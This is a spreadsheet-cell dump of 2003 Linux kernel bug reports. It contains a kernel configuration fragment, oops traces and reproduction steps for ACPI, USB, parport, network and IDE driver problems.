CONFIG_CODA_FS is not set # CONFIG_INTERMEZZO_FS is not set # CONFIG_AFS_FS is not set # # Partition Types # # CONFIG_PARTITION_ADVANCED is not set CONFIG_MSDOS_PARTITION=y CONFIG_SMB_NLS=y CONFIG_NLS=y # # Native Language Support # CONFIG_NLS_DEFAULT="cp850" # CONFIG_NLS_CODEPAGE_437 is not set # CONFIG_NLS_CODEPAGE_737 is not set # CONFIG_NLS_CODEPAGE_775 is not set CONFIG_NLS_CODEPAGE_850=m # CONFIG_NLS_CODEPAGE_852 is not set # CONFIG_NLS_CODEPAGE_855 is not set # CONFIG_NLS_CODEPAGE_857 is not set # CONFIG_NLS_CODEPAGE_860 is not set # CONFIG_NLS_CODEPAGE_861 is not set # CONFIG_NLS_CODEPAGE_862 is not set # CONFIG_NLS_CODEPAGE_863 is not set # CONFIG_NLS_CODEPAGE_864 is not set # CONFIG_NLS_CODEPAGE_865 is not set # CONFIG_NLS_CODEPAGE_866 is not set # CONFIG_NLS_CODEPAGE_869 is not set # CONFIG_NLS_CODEPAGE_936 is not set # CONFIG_NLS_CODEPAGE_950 is not set # CONFIG_NLS_CODEPAGE_932 is not set # CONFIG_NLS_CODEPAGE_949 is not set # CONFIG_NLS_CODEPAGE_874 is not set # CONFIG_NLS_ISO8859_8 is not set # CONFIG_NLS_CODEPAGE_1250 is not set # CONFIG_NLS_CODEPAGE_1251 is not set CONFIG_NLS_ISO8859_1=m # CONFIG_NLS_ISO8859_2 is not set # CONFIG_NLS_ISO8859_3 is not set # CONFIG_NLS_ISO8859_4 is not set # CONFIG_NLS_ISO8859_5 is not set # CONFIG_NLS_ISO8859_6 is not set # CONFIG_NLS_ISO8859_7 is not set # CONFIG_NLS_ISO8859_9 is not set # CONFIG_NLS_ISO8859_13 is not set # CONFIG_NLS_ISO8859_14 is not set CONFIG_NLS_ISO8859_15=m # CONFIG_NLS_KOI8_R is not set # CONFIG_NLS_KOI8_U is not set CONFIG_NLS_UTF8=m # # Profiling support # # CONFIG_PROFILING is not set # # Kernel hacking # CONFIG_DEBUG_KERNEL=y # CONFIG_DEBUG_STACKOVERFLOW is not set # CONFIG_DEBUG_SLAB is not set # CONFIG_DEBUG_IOVIRT is not set CONFIG_MAGIC_SYSRQ=y # CONFIG_DEBUG_SPINLOCK is not set # CONFIG_DEBUG_PAGEALLOC is not set # CONFIG_DEBUG_INFO is not set # CONFIG_DEBUG_SPINLOCK_SLEEP is not set # CONFIG_FRAME_POINTER is not set CONFIG_X86_EXTRA_IRQS=y CONFIG_X86_FIND_SMP_CONFIG=y CONFIG_X86_MPPARSE=y # # Security options # CONFIG_SECURITY=y CONFIG_SECURITY_NETWORK=y CONFIG_SECURITY_CAPABILITIES=y # CONFIG_SECURITY_ROOTPLUG is not set # CONFIG_SECURITY_SELINUX is not set # # Cryptographic options # CONFIG_CRYPTO=y CONFIG_CRYPTO_HMAC=y # CONFIG_CRYPTO_NULL is not set # CONFIG_CRYPTO_MD4 is not set CONFIG_CRYPTO_MD5=m CONFIG_CRYPTO_SHA1=m # CONFIG_CRYPTO_SHA256 is not set # CONFIG_CRYPTO_SHA512 is not set CONFIG_CRYPTO_DES=m CONFIG_CRYPTO_BLOWFISH=m # CONFIG_CRYPTO_TWOFISH is not set CONFIG_CRYPTO_SERPENT=m # CONFIG_CRYPTO_AES is not set # CONFIG_CRYPTO_CAST5 is not set # CONFIG_CRYPTO_CAST6 is not set CONFIG_CRYPTO_DEFLATE=m # CONFIG_CRYPTO_TEST is not set # # Library routines # # CONFIG_CRC32 is not set CONFIG_ZLIB_INFLATE=m CONFIG_ZLIB_DEFLATE=m CONFIG_X86_BIOS_REBOOT=y CONFIG_PC=y</t>
  </si>
  <si>
    <t>no ACPI SCI on Epox KT400 in IO-APIC, noapic works</t>
  </si>
  <si>
    <t>2.6.0-test6, 2.6.0-test8, 2.6.0-test11</t>
  </si>
  <si>
    <t>2003-10-13 10:07 UTC</t>
  </si>
  <si>
    <t>Robert Bihlmeyer</t>
  </si>
  <si>
    <t>When running 2.4.21 on the same machine, pressing the power button generates an appropriate event on /proc/acpi/event. With 2.6.0-test6: no kernel message and nothing reaching a "cat /proc/acpi/event".</t>
  </si>
  <si>
    <t>Joshua Schmidlkofer</t>
  </si>
  <si>
    <t>oops with 2.6.0-test7</t>
  </si>
  <si>
    <t>2003-10-14 02:27 UTC</t>
  </si>
  <si>
    <t>Lenar L</t>
  </si>
  <si>
    <t>2003-11-12 23:21 UTC</t>
  </si>
  <si>
    <t>Distribution: compiled from source Hardware Environment: athlon xp 2500+ 1.5GB RAM Error (regular_file): read_ksyms stat /proc/ksyms failed ksymoops: No such file or directory No modules in ksyms, skipping objects No ksyms, skipping lsmod Machine check exception polling timer started. 3c59x: Donald Becker and others. www.scyld.com/network/vortex.html 0000:01:08.0: 3Com PCI 3c905B Cyclone 100baseTx at 0x9000. Vers LK1.1.19 Unable to handle kernel NULL pointer dereference at virtual address 00000034 c0183365 *pde = 00000000 Oops: 0000 [#1] CPU: 0 EIP: 0060:[&lt;c0183365&gt;] Not tainted Using defaults from ksymoops -t elf32-i386 -a i386 EFLAGS: 00010212 eax: 00000000 ebx: 00000000 ecx: 00043bab edx: c0120cf0 esi: 0000000a edi: f41160c0 ebp: f40fe080 esp: f4095e44 ds: 007b es: 007b ss: 0068 Stack: f40fe080 c02ea6a0 c02ea6a0 c02ea6a0 f4090c90 f4094000 f7b25e00 c0169862 f7b25e00 c03a9af0 f4094000 f7ff4fc0 f7ff4fc0 c01800d4 f41162c0 f7ff4fc0 c011ccae f41162d4 c038024c f41162c0 00000000 f7e739a8 f4090c90 f409fb40 Call Trace: [&lt;c0169862&gt;] dput+0x22/0x210 [&lt;c01800d4&gt;] proc_check_root+0x104/0x160 [&lt;c011ccae&gt;] mmput+0x1e/0xc0 [&lt;c0180e71&gt;] pid_revalidate+0x41/0xd0 [&lt;c013b041&gt;] buffered_rmqueue+0xd1/0x170 [&lt;c0120cf0&gt;] do_exit+0x260/0x400 [&lt;c01802f4&gt;] proc_info_read+0x54/0x140 [&lt;c0152c38&gt;] vfs_read+0xb8/0x130 [&lt;c0152ee2&gt;] sys_read+0x42/0x70 [&lt;c01091db&gt;] syscall_call+0x7/0xb Code: 8b 58 34 8b 70 2c 8b 45 40 89 84 24 ac 00 00 00 8b 85 60 01 &gt;&gt;EIP; c0183365 &lt;proc_pid_stat+265/510&gt; &lt;===== &gt;&gt;edx; c0120cf0 &lt;do_exit+260/400&gt; &gt;&gt;edi; f41160c0 &lt;_end+33d5c6c8/3fc44608&gt; &gt;&gt;ebp; f40fe080 &lt;_end+33d44688/3fc44608&gt; &gt;&gt;esp; f4095e44 &lt;_end+33cdc44c/3fc44608&gt; Trace; c0169862 &lt;dput+22/210&gt; Trace; c01800d4 &lt;proc_check_root+104/160&gt; Trace; c011ccae &lt;mmput+1e/c0&gt; Trace; c0180e71 &lt;pid_revalidate+41/d0&gt; Trace; c013b041 &lt;buffered_rmqueue+d1/170&gt; Trace; c0120cf0 &lt;do_exit+260/400&gt; Trace; c01802f4 &lt;proc_info_read+54/140&gt; Trace; c0152c38 &lt;vfs_read+b8/130&gt; Trace; c0152ee2 &lt;sys_read+42/70&gt; Trace; c01091db &lt;syscall_call+7/b&gt; Code; c0183365 &lt;proc_pid_stat+265/510&gt; 00000000 &lt;_EIP&gt;: Code; c0183365 &lt;proc_pid_stat+265/510&gt; &lt;===== 0: 8b 58 34 mov 0x34(%eax),%ebx &lt;===== Code; c0183368 &lt;proc_pid_stat+268/510&gt; 3: 8b 70 2c mov 0x2c(%eax),%esi Code; c018336b &lt;proc_pid_stat+26b/510&gt; 6: 8b 45 40 mov 0x40(%ebp),%eax Code; c018336e &lt;proc_pid_stat+26e/510&gt; 9: 89 84 24 ac 00 00 00 mov %eax,0xac(%esp,1) Code; c0183375 &lt;proc_pid_stat+275/510&gt; 10: 8b 85 60 01 00 00 mov 0x160(%ebp),%eax</t>
  </si>
  <si>
    <t>2.6.0-test7-bk3</t>
  </si>
  <si>
    <t>2003-10-14 08:52 UTC</t>
  </si>
  <si>
    <t>John Mock</t>
  </si>
  <si>
    <t>2003-11-12 22:35 UTC</t>
  </si>
  <si>
    <t>Distribution: kernel.org Hardware Environment: Sony VAIO R505RE (see 'dmesg' attachment for details) 00:00.0 Host bridge: Intel Corp. 82830 830 Chipset Host Bridge (rev 04) 00:02.0 VGA compatible controller: Intel Corp. 82830 CGC [Chipset Graphics Controller] (rev 04) 00:02.1 Display controller: Intel Corp. 82830 CGC [Chipset Graphics Controller] 00:1d.0 USB Controller: Intel Corp. 82801CA/CAM USB (Hub #1) (rev 02) 00:1d.1 USB Controller: Intel Corp. 82801CA/CAM USB (Hub #2) (rev 02) 00:1d.2 USB Controller: Intel Corp. 82801CA/CAM USB (Hub #3) (rev 02) 00:1e.0 PCI bridge: Intel Corp. 82801BAM/CAM PCI Bridge (rev 42) 00:1f.0 ISA bridge: Intel Corp. 82801CAM ISA Bridge (LPC) (rev 02) 00:1f.1 IDE interface: Intel Corp. 82801CAM IDE U100 (rev 02) 00:1f.3 SMBus: Intel Corp. 82801CA/CAM SMBus (rev 02) 00:1f.5 Multimedia audio controller: Intel Corp. 82801CA/CAM AC'97 Audio (rev 02) 00:1f.6 Modem: Intel Corp. 82801CA/CAM AC'97 Modem (rev 02) 02:02.0 FireWire (IEEE 1394): Texas Instruments TSB43AB22/A IEEE-1394a-2000 Controller (PHY/Link) 02:05.0 CardBus bridge: Ricoh Co Ltd RL5c475 (rev 80) 02:08.0 Ethernet controller: Intel Corp. 82801CAM (ICH3) PRO/100 VE (LOM) Ethernet Controller (rev 42) Software Environment: (see dnesg attachment) Problem Description: If 'parport_pc' is compile as a module, it fails to properly return certain ioport resources after being removed. Steps to reproduce: Debian GNU/Linux testing/unstable tvr-vaio tty1 tvr-vaio login: root Password: Last login: Tue Oct 14 08:26:30 2003 on tty1 Linux tvr-vaio 2.6.0-test7-bk3 #23 Sun Oct 12 15:42:38 PDT 2003 i686 GNU/Linux You have new mail. tvr-vaio:~# cat /proc/ioports &gt; /tmp/ioports1 tvr-vaio:~# modprobe parport_pc parport0: PC-style at 0x378 (0x778) [PCSPP,TRISTATE] parport0: irq 7 detected tvr-vaio:~# cat /proc/ioports &gt; /tmp/ioports2 tvr-vaio:~# rmmod parport_pc tvr-vaio:~# cat /proc/ioports &gt; /tmp/ioports3 tvr-vaio:~# diff /tmp/ioports{1,2} 12a13,14 &gt; 0378-037a : parport0 &gt; 037b-037f : parport0 tvr-vaio:~# diff /tmp/ioports{2,3} 13,14c13 &lt; 0378-037a : parport0 &lt; 037b-037f : parport0 --- &gt; 037b-037f : kkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk&amp;#65533;q&amp;#65533;,Z$S&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;$K6&amp;#65533;{ tvr-vaio:~# cat &gt; /tmp/console.log Attachments containing .config, dmesg, etc. to follow. Please write if you would like additional information.</t>
  </si>
  <si>
    <t>ACPI without PCI</t>
  </si>
  <si>
    <t>2.4.22, 2.4.23-pre7, 2.6.0-test7</t>
  </si>
  <si>
    <t>2003-10-15 13:20 UTC</t>
  </si>
  <si>
    <t>2005-09-09 09:11 UTC</t>
  </si>
  <si>
    <t>ACPI doesn't build if CONFIG_PCI is not enabled: arch/i386/kernel/kernel.o(.text.init+0x3cd0): In function `disable_acpi_pci': : undefined reference to `use_acpi_pci' drivers/acpi/acpi.o(.text.init+0x94e): In function `acpi_bus_init': : undefined reference to `eisa_set_level_irq' When the build is fixed and ACPI is booted with a !CONFIG_PCI kernel, it complains: Linux version 2.6.0-test7 (lenb@dhcppc27) (gcc version 3.3.1 20030930 (Red Hat L inux 3.3.1-6)) #1 Wed Oct 15 14:28:59 EDT 2003 ... ACPI: Subsystem revision 20031002 ACPI-0345: *** Error: Handler for [PCI_Config] returned AE_SUPPORT ACPI-1120: *** Error: Method execution failed [\_SB_.PCI0.LNK1._STA] (Node c df6b720), AE_SUPPORT ACPI-0098: *** Error: Method execution failed [\_SB_.PCI0.LNK1._STA] (Node c df6b720), AE_SUPPORT But it _does_ work -- the power button event is caught and handled.</t>
  </si>
  <si>
    <t>digi_acceleport.c has bogus "address of" operator</t>
  </si>
  <si>
    <t>2.6.0-test7-bk6</t>
  </si>
  <si>
    <t>2003-10-15 21:52 UTC</t>
  </si>
  <si>
    <t>Kurtis Rader</t>
  </si>
  <si>
    <t>2003-12-04 06:38 UTC</t>
  </si>
  <si>
    <t>Distribution: n/a Hardware Environment: Dell 1600SC with Digi Acceleport USB 4-port serial adapter Software Environment: n/a Problem Description: The digi_acceleport.c USB serial driver has a bogus "address of" operator that results in panics like this: kernel BUG at include/asm/spinlock.h:120! invalid operand: 0000 [#1] CPU: 0 EIP: 0060:[&lt;f88e90a0&gt;] Tainted: PF EFLAGS: 00010092 EIP is at digi_wakeup_write_lock+0xa0/0xaa [digi_acceleport] eax: 0000000e ebx: f6528f3c ecx: c0404018 edx: 0001493b esi: f7dba000 edi: 00000296 ebp: f7dbbf64 esp: f7dbbf48 ds: 007b es: 007b ss: 0068 Process events/0 (pid: 10, threadinfo=f7dba000 task=f7de39b0) Stack: f88ec66d f88e9000 f7dbbf64 c0236842 f5281ef0 f7dba000 f5281eec f7dbbfec c0136ebc f5285958 f7dbbfa0 00000000 f7de4e20 f7de4e10 f5285958 f88e9000 00000297 f7de4e08 f7de4df8 5a5a5a5a 5a5a5a5a 5a5a5a5a 00000001 00000000 Call Trace: [&lt;f88e9000&gt;] digi_wakeup_write_lock+0x0/0xaa [digi_acceleport] [&lt;c0236842&gt;] console_callback+0xa0/0xc2 [&lt;c0136ebc&gt;] worker_thread+0x228/0x3ce [&lt;f88e9000&gt;] digi_wakeup_write_lock+0x0/0xaa [digi_acceleport] [&lt;c011e8b6&gt;] default_wake_function+0x0/0x2e [&lt;c010993e&gt;] ret_from_fork+0x6/0x14 [&lt;c011e8b6&gt;] default_wake_function+0x0/0x2e [&lt;c0136c94&gt;] worker_thread+0x0/0x3ce [&lt;c010740d&gt;] kernel_thread_helper+0x5/0xc The problem is that digi_wakeup_write_lock() takes a pointer to a struct usb_serial_port. However, what gets passed is a pointer to a pointer to a struct usb_serial_port. The problem is this assignment in digi_startup(): INIT_WORK(&amp;priv-&gt;dp_wakeup_work, (void *)digi_wakeup_write_lock, (void *)(&amp;serial-&gt;port[i])); That should read: INIT_WORK(&amp;priv-&gt;dp_wakeup_work, digi_wakeup_write_lock, serial-&gt;port[i]); Steps to reproduce: Simply open one of the serial ports; for example, # stty -a &lt; /dev/usb/ttyUSB1</t>
  </si>
  <si>
    <t>Benjamin Herrenschmidt</t>
  </si>
  <si>
    <t>2003-10-18 15:34 UTC</t>
  </si>
  <si>
    <t>uhci-hcd fails after software suspend</t>
  </si>
  <si>
    <t>2004-05-11 13:49 UTC</t>
  </si>
  <si>
    <t>Alan Stern</t>
  </si>
  <si>
    <t>Distribution: kernel.org Hardware Environment: Sony VAIO R505RE (see 'dmesg' attachment for details) 00:00.0 Host bridge: Intel Corp. 82830 830 Chipset Host Bridge (rev 04) 00:02.0 VGA compatible controller: Intel Corp. 82830 CGC [Chipset Graphics Controller] (rev 04) 00:02.1 Display controller: Intel Corp. 82830 CGC [Chipset Graphics Controller] 00:1d.0 USB Controller: Intel Corp. 82801CA/CAM USB (Hub #1) (rev 02) 00:1d.1 USB Controller: Intel Corp. 82801CA/CAM USB (Hub #2) (rev 02) 00:1d.2 USB Controller: Intel Corp. 82801CA/CAM USB (Hub #3) (rev 02) 00:1e.0 PCI bridge: Intel Corp. 82801BAM/CAM PCI Bridge (rev 42) 00:1f.0 ISA bridge: Intel Corp. 82801CAM ISA Bridge (LPC) (rev 02) 00:1f.1 IDE interface: Intel Corp. 82801CAM IDE U100 (rev 02) 00:1f.3 SMBus: Intel Corp. 82801CA/CAM SMBus (rev 02) 00:1f.5 Multimedia audio controller: Intel Corp. 82801CA/CAM AC'97 Audio (rev 02) 00:1f.6 Modem: Intel Corp. 82801CA/CAM AC'97 Modem (rev 02) 02:02.0 FireWire (IEEE 1394): Texas Instruments TSB43AB22/A IEEE-1394a-2000 Controller (PHY/Link) 02:05.0 CardBus bridge: Ricoh Co Ltd RL5c475 (rev 80) 02:08.0 Ethernet controller: Intel Corp. 82801CAM (ICH3) PRO/100 VE (LOM) Ethernet Controller (rev 42) Software Environment: (see dnesg attachment) Problem Description: After software suspend (either flavor), USB controller seems hopelessly confused: Steps to Reproduce: Debian GNU/Linux testing/unstable tvr-vaio tty1 tvr-vaio login: root Password: Last login: Sat Oct 18 14:53:29 2003 on tty1 Linux tvr-vaio 2.6.0-test8 #3 Sat Oct 18 10:51:09 PDT 2003 i686 GNU/Linux You have new mail. tvr-vaio:~# cat /proc/swaps Filename Type Size Used Priority /dev/hda7 partition 500460 0 -1 tvr-vaio:~# sync; echo 4b &gt; /proc/acpi/sleep [press power button] lilo: 2.6.0-test8 resume=/dev/hda7 drivers/usb/host/uhci-hcd.c: 1840: host controller halted. very bad hub 3-0:1.0: new USB device on port 1, assigned address 3 tvr-vaio:~# e100: eth0 NIC Link is Up 100 Mbps Full duplex drivers/usb/host/uhci-hcd.c: 1840: host controller halted. very bad drivers/usb/host/uhci-hcd.c: 1840: host controller halted. very bad drivers/usb/host/uhci-hcd.c: 1840: host controller halted. very bad drivers/usb/host/uhci-hcd.c: 1840: host controller halted. very bad drivers/usb/host/uhci-hcd.c: 1840: host controller halted. very bad usb 3-1: control timeout on ep0out drivers/usb/host/uhci-hcd.c: 1840: host controller halted. very bad drivers/usb/host/uhci-hcd.c: 1840: host controller halted. very bad drivers/usb/host/uhci-hcd.c: 1840: host controller halted. very bad usb 3-1: control timeout on ep0out tvr-vaio:~# tvr-vaio:~# cat &gt; /tmp/console.log 'dmesg' and '.config' attachments to follow. Machine will also not shutdown cleanly at this point, and 'rmmod uhci-hcd' gets an 'oops' (details available cheerfully upon request). (Even using 'sysrq' to sync and unmount still doesn't avoid an 'fsck' in this case.)</t>
  </si>
  <si>
    <t>floppy driver hangs machine on IO error</t>
  </si>
  <si>
    <t>2003-10-18 19:14 UTC</t>
  </si>
  <si>
    <t>2005-08-07 13:43 UTC</t>
  </si>
  <si>
    <t>I saw a hard hang after trying to read a defective floppy disk (in X, may have invisibly oopsed)</t>
  </si>
  <si>
    <t>(net e1000) transmit timeout</t>
  </si>
  <si>
    <t>2.6.0-test9</t>
  </si>
  <si>
    <t>2003-10-19 01:30 UTC</t>
  </si>
  <si>
    <t>Tomasz Dudziak</t>
  </si>
  <si>
    <t>2005-07-13 17:00 UTC</t>
  </si>
  <si>
    <t>Distribution: Debian Hardware Environment: Intel server platform Intel SE7501WV2 motherboard Intel 82546EB onboard gigabit NICs Intel SCRU42L RAID controller 3com gigabit switch Software Environment: Tested Apache and Squid Problem Description: Oct 18 20:51:56 s216 kernel: NETDEV WATCHDOG: eth0: transmit timed out Oct 18 20:51:59 s216 kernel: e1000: eth0 NIC Link is Up 1000 Mbps Full Duplex More traffic=more timeouts. At 500kB/s timeouts occur about every 30 min. Seen this on 4 servers. Does not happen with 2.4 Steps to reproduce: 1. Set up squid or apache. 2. Generate some traffic.</t>
  </si>
  <si>
    <t>Not using ide-scsi on DVD drive causes access problems on DVDs</t>
  </si>
  <si>
    <t>2.6.0-test8; 2.4.22</t>
  </si>
  <si>
    <t>2003-10-19 18:17 UTC</t>
  </si>
  <si>
    <t>Stephen Cofer</t>
  </si>
  <si>
    <t>2004-03-09 06:33 UTC</t>
  </si>
  <si>
    <t>As I have read many "resolutions" to problems in the 2.6.0-testX series regarding problems with CD/DVD drives using ide-scsi to simply quit using ide-scsi as it will be "depreciated", I must point out a recurring problem I have had for as long as I recall with my DVD drive (Acer 10x/40x). Using it with ide-scsi has given me no problems reading any DVDs, data or video (It also works perfectly in Windows 2000). However, remove ide-scsi and the drive suddenly seems to lose the ability to read past a certain point on the disk -- it is hard to tell the limit for certain but it seems to be around what would be the capacity of a normal CD (~650-700MB). I've tested this today in both kernel 2.4.22 and 2.6.0-test8, with the same results. This is what dmesg returns when I try to read a file on a data DVD at the edge of that limit, or play a DVD video past that limit (this specific example was after trying to cat a small text file several times): ISO 9660 Extensions: Microsoft Joliet Level 1 ISOFS: changing to secondary root attempt to access beyond end of device hdc: rw=0, want=3863380, limit=1332944 attempt to access beyond end of device hdc: rw=0, want=3852532, limit=1332944 attempt to access beyond end of device hdc: rw=0, want=3852532, limit=1332944 attempt to access beyond end of device hdc: rw=0, want=3852532, limit=1332944 attempt to access beyond end of device hdc: rw=0, want=3852532, limit=1332944 attempt to access beyond end of device hdc: rw=0, want=3852532, limit=1332944 attempt to access beyond end of device hdc: rw=0, want=3612392, limit=1332944 attempt to access beyond end of device hdc: rw=0, want=3610048, limit=1332944 attempt to access beyond end of device hdc: rw=0, want=3478856, limit=1332944 Buffer I/O error on device hdc, logical block 869713 attempt to access beyond end of device hdc: rw=0, want=3478856, limit=1332944 Buffer I/O error on device hdc, logical block 869713 attempt to access beyond end of device hdc: rw=0, want=3546288, limit=1332944 attempt to access beyond end of device hdc: rw=0, want=3493152, limit=1332944 attempt to access beyond end of device hdc: rw=0, want=3478856, limit=1332944 Buffer I/O error on device hdc, logical block 869713 The system is not affected by this (no hangs or problems, just a read error from the cat and the above messages in logs). No errors occur when I try to do the same using ide-scsi. System info: ver_linux: Linux sdchomelinux 2.6.0-test8 #1 Sun Oct 19 18:45:43 CDT 2003 i686 Intel(R) Pentium(R) 4 CPU 1.50GHz GenuineIntel GNU/Linux Gnu C 3.2.3 Gnu make 3.80 util-linux 2.11z mount 2.11z module-init-tools 0.9.12 e2fsprogs 1.33 Linux C Library 2.3.2 Dynamic linker (ldd) 2.3.2 Procps 3.1.9 Net-tools 1.60 Kbd 1.06 Sh-utils 5.0 Modules Loaded ipt_TOS ipt_MASQUERADE ipt_REJECT ipt_LOG ipt_state ip_nat_irc ip_nat_ftp ip_conntrack_irc ip_conntrack_ftp ipt_multiport ipt_conntrack iptable_filter iptable_mangle iptable_nat ip_conntrack ip_tables rtc joydev snd_cs46xx 8139too mii ne2k_pci 8390 crc32 # cat /proc/ide/hdc/model ATAPI DVD-ROM 10X Maximum This is using plain kernels, no patches, on Gentoo 1.4. Any more information needed, ask, I haven't submitted a kernel bug report before.</t>
  </si>
  <si>
    <t>crash on boot on Compaq N620c with acpi-20031002-2.4.22.diff.gz</t>
  </si>
  <si>
    <t>2003-10-19 19:11 UTC</t>
  </si>
  <si>
    <t>Aron Griffis</t>
  </si>
  <si>
    <t>2004-03-04 12:24 UTC</t>
  </si>
  <si>
    <t>Distribution: Gentoo (but using vanilla kernel sources) Hardware Environment: Compaq N620c Software Environment: gcc-3.2.3, binutils-2.14.90.0.6 Problem Description: crash on boot Steps to reproduce: 1. build 2.4.22 plus acpi-20031002-2.4.22.diff.gz 2. boot on Compaq N620c 3. collect the debugging information on serial console ;-) Booting 'vanilla-sources-2.4.22-acpi' root (hd0,0) Filesystem type is reiserfs, partition type 0x83 kernel (hd0,0)/boot/bzImage-2.4.22-acpi root=/dev/hda3 console=ttyS0,57600n8 [Linux-bzImage, setup=0x1400, size=0x12faf6] Linux version 2.4.22-acpi (root@mustard) (gcc version 3.3.1 20030916 (Gentoo Linux 3.3.1-r4, propolice)) #5 Mon Oct 20 05:15:13 EDT 2003 BIOS-provided physical RAM map: BIOS-e820: 0000000000000000 - 000000000009fc00 (usable) BIOS-e820: 000000000009fc00 - 00000000000a0000 (reserved) BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved) BIOS-e820: 0000000000100000 - 000000001ffd0000 (usable) BIOS-e820: 000000001ffd0000 - 000000001fff0c00 (reserved) BIOS-e820: 000000001fff0c00 - 000000001fffc000 (ACPI NVS) BIOS-e820: 000000001fffc000 - 0000000020000000 (reserved) 511MB LOWMEM available. On node 0 totalpages: 131024 zone(0): 4096 pages. zone(1): 126928 pages. zone(2): 0 pages. ACPI: RSDP (v000 COMPAQ ) @ 0x000f9970 ACPI: RSDT (v001 COMPAQ CPQ0058 0x02050320 CPQ 0x00000001) @ 0x1fff0c84 ACPI: FADT (v002 COMPAQ CPQ0058 0x00000002 CPQ 0x00000001) @ 0x1fff0c00 ACPI: SSDT (v001 COMPAQ CPQGysr 0x00001001 MSFT 0x0100000e) @ 0x1fff7545 ACPI: DSDT (v001 COMPAQ N620c 0x00010000 MSFT 0x0100000e) @ 0x00000000 Kernel command line: root=/dev/hda3 console=ttyS0,57600n8 Local APIC disabled by BIOS -- reenabling. Found and enabled local APIC! Initializing CPU#0 Detected 1598.657 MHz processor. Console: colour VGA+ 80x25 Calibrating delay loop... 3191.60 BogoMIPS Memory: 515220k/524096k available (1943k kernel code, 8488k reserved, 533k data, 108k init, 0k highmem) Dentry cache hash table entries: 65536 (order: 7, 524288 bytes) Inode cache hash table entries: 32768 (order: 6, 262144 bytes) Mount cache hash table entries: 512 (order: 0, 4096 bytes) Buffer cache hash table entries: 32768 (order: 5, 131072 bytes) Page-cache hash table entries: 131072 (order: 7, 524288 bytes) Intel machine check architecture supported. Intel machine check reporting enabled on CPU#0. CPU: Intel(R) Pentium(R) M processor 1600MHz stepping 05 Enabling fast FPU save and restore... done. Enabling unmasked SIMD FPU exception support... done. Checking 'hlt' instruction... OK. POSIX conformance testing by UNIFIX enabled ExtINT on CPU#0 ESR value before enabling vector: 00000000 ESR value after enabling vector: 00000000 Using local APIC timer interrupts. calibrating APIC timer ... ..... CPU clock speed is 1598.6704 MHz. ..... host bus clock speed is 99.9168 MHz. cpu: 0, clocks: 999168, slice: 499584 CPU0&lt;T0:999168,T1:499584,D:0,S:499584,C:999168&gt; mtrr: v1.40 (20010327) Richard Gooch (rgooch@atnf.csiro.au) mtrr: detected mtrr type: Intel ACPI: Subsystem revision 20031002 PCI: PCI BIOS revision 2.10 entry at 0xf031f, last bus=4 PCI: Using configuration type 1 tbxface-0117 [03] acpi_load_tables : ACPI Tables successfully acquired Parsing all Control Methods:.......................................................................................................................................................................................................................................................................................... Table [DSDT](id F005) - 841 Objects with 76 Devices 282 Methods 26 Regions Parsing all Control Methods:.... Table [SSDT](id F003) - 9 Objects with 0 Devices 4 Methods 0 Regions ACPI Namespace successfully loaded at root c039cffc evxfevnt-0093 [04] acpi_enable : Transition to ACPI mode successful evgpeblk-0748 [06] ev_create_gpe_block : GPE 00 to 31 [_GPE] 4 regs at 0000000000001028 on int 9 evgpeblk-0221 [08] ev_save_method_info : Unknown GPE method type: C163 (name not of form _Lnn or _Enn) evgpeblk-0221 [08] ev_save_method_info : Unknown GPE method type: C1EF (name not of form _Lnn or _Enn) Completing Region/Field/Buffer/Package initialization:.................................................................................................................... Initialized 25/26 Regions 0/0 Fields 27/27 Buffers 64/64 Packages (858 nodes) Executing all Device _STA and_INI methods:............................................................................. 77 Devices found containing: 77 _STA, 8 _INI methods ACPI: Interpreter enabled ACPI: Using PIC for interrupt routing ACPI: System [ACPI] (supports S0 S3 S4bios S4 S5) dsopcode-0526 [20] ds_init_buffer_field : &lt;1&gt;Unable to handle kernel NULL pointer dereference at virtual address 00000004 printing eip: c02e1c19 *pde = 00000000 Oops: 0000 CPU: 0 EIP: 0010:[&lt;c02e1c19&gt;] Not tainted EFLAGS: 00010213 eax: 00000004 ebx: 0000000a ecx: 00000004 edx: 00000003 esi: c039cb67 edi: 00000000 ebp: dffcba28 esp: dffcb9f0 ds: 0018 es: 0018 ss: 0018 Process swapper (pid: 1, stackpage=dffcb000) Stack: dffcba38 ffffffff 00000570 00000000 0000000a ffffffff 00000003 00000002 00000004 00000004 ffffffff 00000001 dffcbaa4 c159d9e8 dffcba40 c02e1da8 c039cb40 3fc634c0 c03141ca dffcba9c dffcba54 c01d5a39 c039cb40 c03141a0 Call Trace: [&lt;c02e1da8&gt;] [&lt;c01d5a39&gt;] [&lt;c01f9358&gt;] [&lt;c01d9503&gt;] [&lt;c01d96dd&gt;] [&lt;c01da97b&gt;] [&lt;c01f0377&gt;] [&lt;c01f94ab&gt;] [&lt;c01d7e4b&gt;] [&lt;c01dc1ae&gt;] [&lt;c01f0819&gt;] [&lt;c01f14a7&gt;] [&lt;c01ebeed&gt;] [&lt;c01ebddb&gt;] [&lt;c01ebb84&gt;] [&lt;c01f94ab&gt;] [&lt;c01f9dc4&gt;] [&lt;c01f497d&gt;] [&lt;c01f4c7c&gt;] [&lt;c01f93b0&gt;] [&lt;c01ff836&gt;] [&lt;c01ffa61&gt;] [&lt;c01fd6eb&gt;] [&lt;c01fda7b&gt;] [&lt;c01fe2b6&gt;] [&lt;c01fe4b4&gt;] [&lt;c0105000&gt;] [&lt;c0105055&gt;] [&lt;c0105000&gt;] [&lt;c010580e&gt;] [&lt;c0105040&gt;] Code: 80 38 00 74 07 40 4a 83 fa ff 75 f4 29 c8 83 e7 10 89 c3 75 &lt;0&gt;Kernel panic: Attempted to kill init! ------------------ Okay, a couple notes before I hit commit. First, I think this is basically the same bug as 1385, just a different kernel version. Second, I can boot this machine with 2.4.22 vanilla, but then it doesn't power down automatically when halt is issued. The reason I've been experimenting with the ACPI patches is to try to fix that problem.</t>
  </si>
  <si>
    <t>HighPoint 302 has ATA133 support disabled in the driver</t>
  </si>
  <si>
    <t>2003-10-20 11:49 UTC</t>
  </si>
  <si>
    <t>ajax</t>
  </si>
  <si>
    <t>2007-08-03 13:39 UTC</t>
  </si>
  <si>
    <t>Sergei Shtylyov</t>
  </si>
  <si>
